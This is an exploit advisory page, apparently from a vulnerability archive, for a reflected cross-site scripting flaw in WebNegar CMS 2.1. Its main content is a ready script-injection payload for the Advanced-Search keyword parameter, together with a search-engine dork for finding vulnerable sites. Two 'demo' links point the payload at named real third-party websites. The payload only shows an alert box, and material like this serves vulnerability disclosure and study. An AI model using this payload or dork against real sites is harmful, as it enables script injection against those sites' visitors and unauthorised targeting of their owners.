WebNegar CMS 2.1 Cross Site Scripting Vulnerability

2010-12-07 / 2010-12-08
Credit: Ajax Security Team
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-79
Dork: Powered by WebNegar CMS 2.1

################################################################# [+] Exploit Title: WebNegar CMS 2.1 Cross Site Scripting Vulnerability [+] Author: Cair3x [+] Team : [ Ajax ] Security Team [+] Download : http://www.webnegar.org/ [+] Dork : Powered by WebNegar CMS 2.1 And [ http://www.google.com/webhp?hl=fa#hl=fa&source=hp&q=Powered+by+WebNegar+CMS+2.1&btnG=%D8%AC%D8%B3%D8%AA%D8%AC%D9%88%D9%8A+Google&lr=&fp=af862d229bf22b55 ] ###########################[ Exploit ]########################### type=modules&module=Advanced-Search&keyword=[Xss] http://www.Target.com/[Patch]/?type=modules&module=Advanced-Search&keyword=[Xss] http://www.Target.com/[Patch]/?type=modules&module=Advanced-Search&keyword="><script>alert(String.fromCharCode(88,83,83))</script> Filter ' Demo : http://www.eabfar.ir/fa/?type=modules&module=Advanced-Search&keyword=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E Demo 2 : http://www.gkazar.ir/?type=modules&module=Advanced-Search&keyword=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/script%3E ###########################[ Exploit ]########################### ################################################################# BY : Cair3x [Cair3x.Support@Gmail.com] Web Site : Ajaxtm.Com Forum : http://Ajaxtm.com/ [+] We Are : HUrr!c4nE , Cair3x #################################################################

References:

http://Ajaxtm.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top